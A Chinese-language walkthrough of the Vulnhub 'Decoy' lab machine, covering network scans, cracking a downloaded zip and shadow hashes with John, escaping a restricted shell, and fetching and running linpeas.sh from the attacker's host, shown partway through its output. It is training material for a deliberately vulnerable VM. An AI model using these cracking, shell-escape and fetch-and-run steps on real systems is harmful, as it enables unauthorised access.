Vulnhub Decoy靶机攻略
Decoy
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Decoy]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.61.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:ef:a8:59 1 60 PCS Systemtechnik GmbH
192.168.56.158 08:00:27:3c:d4:65 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.158
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Decoy]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.158 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-07 04:10 EST
Nmap scan report for bogon (192.168.56.158)
Host is up (0.00028s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 a9:b5:3e:3b:e3:74:e4:ff:b6:d5:9f:f1:81:e7:a4:4f (RSA)
| 256 ce:f3:b3:e7:0e:90:e2:64:ac:8d:87:0f:15:88:aa:5f (ECDSA)
|_ 256 66:a9:80:91:f3:d8:4b:0a:69:b0:00:22:9f:3c:4c:5a (ED25519)
80/tcp open http Apache httpd 2.4.38
|_http-title: Index of /
| http-ls: Volume /
| SIZE TIME FILENAME
| 3.0K 2020-07-07 16:36 save.zip
|_
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:3C:D4:65 (Oracle VirtualBox virtual NIC)
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.59 seconds
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Decoy]
└─$ gobuster dir -u http://192.168.56.158 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.158
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/07 04:19:18 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 279]
Progress: 17944 / 56165 (31.95%)[ERROR] 2022/11/07 04:19:21 [!] parse "http://192.168.56.158/error\x1f_log": net/url: invalid control character in URL
Progress: 53999 / 56165 (96.14%)===============================================================
2022/11/07 04:19:25 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Decoy]
└─$ gobuster dir -u http://192.168.56.158 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.158
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: txt,sh,php,html
[+] Timeout: 10s
===============================================================
2022/11/07 04:19:36 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
Progress: 94217 / 280825 (33.55%)[ERROR] 2022/11/07 04:19:47 [!] parse "http://192.168.56.158/besalu\t.php": net/url: invalid control character in URL
Progress: 103125 / 280825 (36.72%)[ERROR] 2022/11/07 04:19:47 [!] parse "http://192.168.56.158/error\x1f_log": net/url: invalid control character in URL
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
Progress: 280150 / 280825 (99.76%)===============================================================
2022/11/07 04:20:07 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Decoy]
└─$ nikto -h http://192.168.56.158
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.158
+ Target Hostname: 192.168.56.158
+ Target Port: 80
+ Start Time: 2022-11-07 04:20:14 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /: Directory indexing found.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-3268: /./: Directory indexing found.
+ /./: Appending '/./' to a directory allows indexing
+ OSVDB-3268: //: Directory indexing found.
+ //: Apache on Red Hat Linux release 9 reveals the root directory listing by default if there is no index page.
+ OSVDB-3268: /%2e/: Directory indexing found.
+ OSVDB-576: /%2e/: Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. http://www.securityfocus.com/bid/2513.
+ OSVDB-3268: ///: Directory indexing found.
+ OSVDB-119: /?PageServices: The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0269.
+ OSVDB-119: /?wp-cs-dump: The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0269.
+ OSVDB-3268: ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: Directory indexing found.
+ OSVDB-3288: ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: Abyss 1.03 reveals directory listing when /'s are requested.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time: 2022-11-07 04:21:03 (GMT-5) (49 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)? n
┌──(kali㉿kali)-[~/Vulnhub/Decoy]
└─$ dirb http://192.168.56.158
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Nov 7 04:21:11 2022
URL_BASE: http://192.168.56.158/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.158/ ----
+ http://192.168.56.158/server-status (CODE:403|SIZE:279)
-----------------
END_TIME: Mon Nov 7 04:21:13 2022
DOWNLOADED: 4612 - FOUND: 1
将目标站点的save.zip下载到本地。
┌──(kali㉿kali)-[~/Vulnhub/Decoy]
└─$ mv ~/Downloads/save.zip .
┌──(kali㉿kali)-[~/Vulnhub/Decoy]
└─$ ls
nmap_full_scan save.zip
┌──(kali㉿kali)-[~/Vulnhub/Decoy]
└─$ unzip save.zip
Archive: save.zip
[save.zip] etc/passwd password:
┌──(kali㉿kali)-[~/Vulnhub/Decoy]
└─$ zip2john save.zip > hashes
ver 2.0 efh 5455 efh 7875 save.zip/etc/passwd PKZIP Encr: TS_chk, cmplen=668, decmplen=1807, crc=B3ACDAFE ts=90AB cs=90ab type=8
ver 2.0 efh 5455 efh 7875 save.zip/etc/shadow PKZIP Encr: TS_chk, cmplen=434, decmplen=1111, crc=E11EC139 ts=834F cs=834f type=8
ver 2.0 efh 5455 efh 7875 save.zip/etc/group PKZIP Encr: TS_chk, cmplen=460, decmplen=829, crc=A1F81C08 ts=8D07 cs=8d07 type=8
ver 2.0 efh 5455 efh 7875 save.zip/etc/sudoers PKZIP Encr: TS_chk, cmplen=368, decmplen=669, crc=FF05389F ts=1535 cs=1535 type=8
ver 2.0 efh 5455 efh 7875 save.zip/etc/hosts PKZIP Encr: TS_chk, cmplen=140, decmplen=185, crc=DFB905CD ts=8759 cs=8759 type=8
ver 1.0 efh 5455 efh 7875 ** 2b ** save.zip/etc/hostname PKZIP Encr: TS_chk, cmplen=45, decmplen=33, crc=D9C379A9 ts=8CE8 cs=8ce8 type=0
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
┌──(kali㉿kali)-[~/Vulnhub/Decoy]
└─$ ls
hashes nmap_full_scan save.zip
┌──(kali㉿kali)-[~/Vulnhub/Decoy]
└─$ john hashes /usr/share/wordlists/rockyou.txt
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
manuel (save.zip)
1g 0:00:00:00 DONE 2/3 (2022-11-07 04:24) 16.66g/s 1263Kp/s 1263Kc/s 1263KC/s 123456..Peter
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(kali㉿kali)-[~/Vulnhub/Decoy]
└─$
成功破解save.zip的密码
┌──(kali㉿kali)-[~/Vulnhub/Decoy]
└─$ cd etc
┌──(kali㉿kali)-[~/Vulnhub/Decoy/etc]
└─$ ls
group hostname hosts passwd shadow sudoers
┌──(kali㉿kali)-[~/Vulnhub/Decoy/etc]
└─$ cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
avahi:x:107:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
saned:x:108:118::/var/lib/saned:/usr/sbin/nologin
colord:x:109:119:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:110:7:HPLIP system user,,,:/var/run/hplip:/bin/false
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
296640a3b825115a47b68fc44501c828:x:1000:1000:,,,:/home/296640a3b825115a47b68fc44501c828:/bin/rbash
┌──(kali㉿kali)-[~/Vulnhub/Decoy/etc]
└─$ cat sudoers
#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults env_reset
Defaults mail_badpass
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
# Host alias specification
# User alias specification
# Cmnd alias specification
# User privilege specification
root ALL=(ALL:ALL) ALL
# Allow members of group sudo to execute any command
%sudo ALL=(ALL:ALL) ALL
# See sudoers(5) for more information on "#include" directives:
#includedir /etc/sudoers.d
┌──(kali㉿kali)-[~/Vulnhub/Decoy/etc]
└─$ ls
group hostname hosts passwd shadow sudoers
┌──(kali㉿kali)-[~/Vulnhub/Decoy/etc]
└─$ cat shadow
root:$6$RucK3DjUUM8TjzYJ$x2etp95bJSiZy6WoJmTd7UomydMfNjo97Heu8nAob9Tji4xzWSzeE0Z2NekZhsyCaA7y/wbzI.2A2xIL/uXV9.:18450:0:99999:7:::
daemon:*:18440:0:99999:7:::
bin:*:18440:0:99999:7:::
sys:*:18440:0:99999:7:::
sync:*:18440:0:99999:7:::
games:*:18440:0:99999:7:::
man:*:18440:0:99999:7:::
lp:*:18440:0:99999:7:::
mail:*:18440:0:99999:7:::
news:*:18440:0:99999:7:::
uucp:*:18440:0:99999:7:::
proxy:*:18440:0:99999:7:::
www-data:*:18440:0:99999:7:::
backup:*:18440:0:99999:7:::
list:*:18440:0:99999:7:::
irc:*:18440:0:99999:7:::
gnats:*:18440:0:99999:7:::
nobody:*:18440:0:99999:7:::
_apt:*:18440:0:99999:7:::
systemd-timesync:*:18440:0:99999:7:::
systemd-network:*:18440:0:99999:7:::
systemd-resolve:*:18440:0:99999:7:::
messagebus:*:18440:0:99999:7:::
avahi-autoipd:*:18440:0:99999:7:::
sshd:*:18440:0:99999:7:::
avahi:*:18440:0:99999:7:::
saned:*:18440:0:99999:7:::
colord:*:18440:0:99999:7:::
hplip:*:18440:0:99999:7:::
systemd-coredump:!!:18440::::::
296640a3b825115a47b68fc44501c828:$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us.:18450:0:99999:7:::
现在得到了用户名:296640a3b825115a47b68fc44501c828
以及它的加密后的密码:
$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us.
接下来需要破解这个密码
┌──(kali㉿kali)-[~/Vulnhub/Decoy]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt shadow
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
server (296640a3b825115a47b68fc44501c828)
1g 0:00:00:04 DONE (2022-11-07 04:29) 0.2403g/s 4123p/s 4123c/s 4123C/s felton..Hunter
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
成功破解了密码,接下来用这个用户名和密码登录目标主机。
┌──(kali㉿kali)-[~/Vulnhub/Decoy]
└─$ ssh 296640a3b825115a47b68fc44501c828@192.168.56.158
The authenticity of host '192.168.56.158 (192.168.56.158)' can't be established.
ED25519 key fingerprint is SHA256:qzYkm7MeglkL3QtA6bU4nv7yc8jlb1x7fZ7ALPBohNQ.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.158' (ED25519) to the list of known hosts.
296640a3b825115a47b68fc44501c828@192.168.56.158's password:
Linux 60832e9f188106ec5bcc4eb7709ce592 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jul 7 16:45:50 2020 from 192.168.1.162
-rbash: dircolors: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ id
uid=1000(296640a3b825115a47b68fc44501c828) gid=1000(296640a3b825115a47b68fc44501c828) groups=1000(296640a3b825115a47b68fc44501c828)
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ sudo -l
-rbash: sudo: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ls
honeypot.decoy honeypot.decoy.cpp id ifconfig ls mkdir SV-502 user.txt
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ cat user.txt
-rbash: cat: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$
发现是一个受限的shell,连cat命令都无法执行,需要在ssh 时添加bash --noprofile
还是不行,查看一下环境变量,发现只有家目录,需要修改一下PATH
┌──(kali㉿kali)-[~/Vulnhub/Decoy]
└─$ ssh 296640a3b825115a47b68fc44501c828@192.168.56.158 -t "bash --noprofile"
296640a3b825115a47b68fc44501c828@192.168.56.158's password:
bash: dircolors: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ls
honeypot.decoy honeypot.decoy.cpp id ifconfig ls mkdir SV-502 user.txt
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ cat user.txt
bash: cat: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ echo $PATH
PATH:/home/296640a3b825115a47b68fc44501c828/
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/bin:/sbin
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ cat user.txt
35253d886842075b2c6390f35946e41f
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$
提权
上传linpeas.sh脚本到目标主机执行:
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ wget http://192.168.56.137:8000/linpeas.sh
--2022-11-07 04:37:19-- http://192.168.56.137:8000/linpeas.sh
Connecting to 192.168.56.137:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 827827 (808K) [text/x-sh]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[========================================================================================================================================>] 808.42K --.-KB/s in 0.003s
2022-11-07 04:37:19 (228 MB/s) - ‘linpeas.sh’ saved [827827/827827]
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ ls
linpeas.sh systemd-private-033dd996c6d74ddc8c911490693b6c8f-apache2.service-6n54cg systemd-private-033dd996c6d74ddc8c911490693b6c8f-systemd-timesyncd.service-3K1JiJ
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ chmod +x linpeas.sh
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ ./linpeas.sh
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀
▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Get the latest version : https://github.com/sponsors/carlospolop |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
linpeas-ng by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════
╚═══════════════════╝
OS: Linux version 4.19.0-9-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07)
User & Groups: uid=1000(296640a3b825115a47b68fc44501c828) gid=1000(296640a3b825115a47b68fc44501c828) groups=1000(296640a3b825115a47b68fc44501c828)
Hostname: 60832e9f188106ec5bcc4eb7709ce592
Writable folder: /dev/shm
[+] /usr/bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /usr/bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)
[+] /usr/bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE
╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════
╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 4.19.0-9-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07)
Distributor ID: Debian
Description: Debian GNU/Linux 10 (buster)
Release: 10
Codename: buster
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.27
╔══════════╣ CVEs Check
Vulnerable to CVE-2021-4034
Potentially Vulnerable to CVE-2022-2588
╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/bin:/sbin
New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/bin:/sbin
╔══════════╣ Date & uptime
Mon 07 Nov 2022 04:37:34 AM EST
04:37:34 up 45 min, 1 user, load average: 0.00, 0.02, 0.08
╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk
sda
sda1
sda2
sda5
╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices
UUID=13cd44ba-1a46-4da4-a792-5cd83df52fbf / ext4 errors=remount-ro 0 1
UUID=42504925-7415-4691-8b03-73d4ec1ea8b7 none swap sw 0 0
/dev/sr0 /media/cdrom0 udf,iso9660 user,noauto 0 0
/dev/sr1 /media/cdrom1 udf,iso9660 user,noauto 0 0
╔══════════╣ Environment
╚ Any private information inside environment variables?
HISTFILESIZE=0
MAIL=/var/mail/296640a3b825115a47b68fc44501c828
USER=296640a3b825115a47b68fc44501c828
SSH_CLIENT=192.168.56.137 35748 22
XDG_SESSION_TYPE=tty
SHLVL=1
HOME=/home/296640a3b825115a47b68fc44501c828
OLDPWD=/home/296640a3b825115a47b68fc44501c828
SSH_TTY=/dev/pts/0
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus
LOGNAME=296640a3b825115a47b68fc44501c828
_=./linpeas.sh
XDG_SESSION_CLASS=user
TERM=xterm-256color
XDG_SESSION_ID=46
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/bin:/sbin
XDG_RUNTIME_DIR=/run/user/1000
LANG=en_US.UTF-8
HISTSIZE=0
SHELL=/bin/rbash
PWD=/tmp
SSH_CONNECTION=192.168.56.137 35748 192.168.56.158 22
HISTFILE=/dev/null
╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed
dmesg Not Found
╔══════════╣ System timers
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
NEXT LEFT LAST PASSED UNIT ACTIVATES
Mon 2022-11-07 04:39:00 EST 1min 19s left Mon 2022-11-07 04:09:01 EST 28min ago phpsessionclean.timer phpsessionclean.service
Mon 2022-11-07 06:09:01 EST 1h 31min left Mon 2022-11-07 03:52:00 EST 45min ago apt-daily-upgrade.timer apt-daily-upgrade.service
Mon 2022-11-07 06:27:19 EST 1h 49min left Mon 2022-11-07 03:52:00 EST 45min ago apt-daily.timer apt-daily.service
Mon 2022-11-07 07:33:58 EST 2h 56min left Mon 2022-11-07 03:52:00 EST 45min ago anacron.timer anacron.service
Tue 2022-11-08 00:00:00 EST 19h left Mon 2022-11-07 03:52:00 EST 45min ago logrotate.timer logrotate.service
Tue 2022-11-08 00:00:00 EST 19h left Mon 2022-11-07 03:52:00 EST 45min ago man-db.timer man-db.service
Tue 2022-11-08 04:06:59 EST 23h left Mon 2022-11-07 04:06:59 EST 30min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
╔══════════╣ Analyzing .timer files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
╔══════════╣ Analyzing .socket files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
/etc/systemd/system/sockets.target.wants/avahi-daemon.socket is calling this writable listener: /run/avahi-daemon/socket
/usr/lib/systemd/system/avahi-daemon.socket is calling this writable listener: /run/avahi-daemon/socket
/usr/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/usr/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/usr/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/usr/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog
/usr/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
╔══════════╣ Unix Sockets Listening
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
/run/avahi-daemon/socket
└─(Read Write)
/run/cups/cups.sock
└─(Read Write)
/run/dbus/system_bus_socket
└─(Read Write)
/run/systemd/fsck.progress
/run/systemd/journal/dev-log
└─(Read Write)
/run/systemd/journal/socket
└─(Read Write)
/run/systemd/journal/stdout
└─(Read Write)
/run/systemd/journal/syslog
└─(Read Write)
/run/systemd/notify
└─(Read Write)
/run/systemd/private
└─(Read Write)
/run/udev/control
/run/user/1000/bus
└─(Read Write)
/run/user/1000/systemd/notify
└─(Read Write)
/run/user/1000/systemd/private
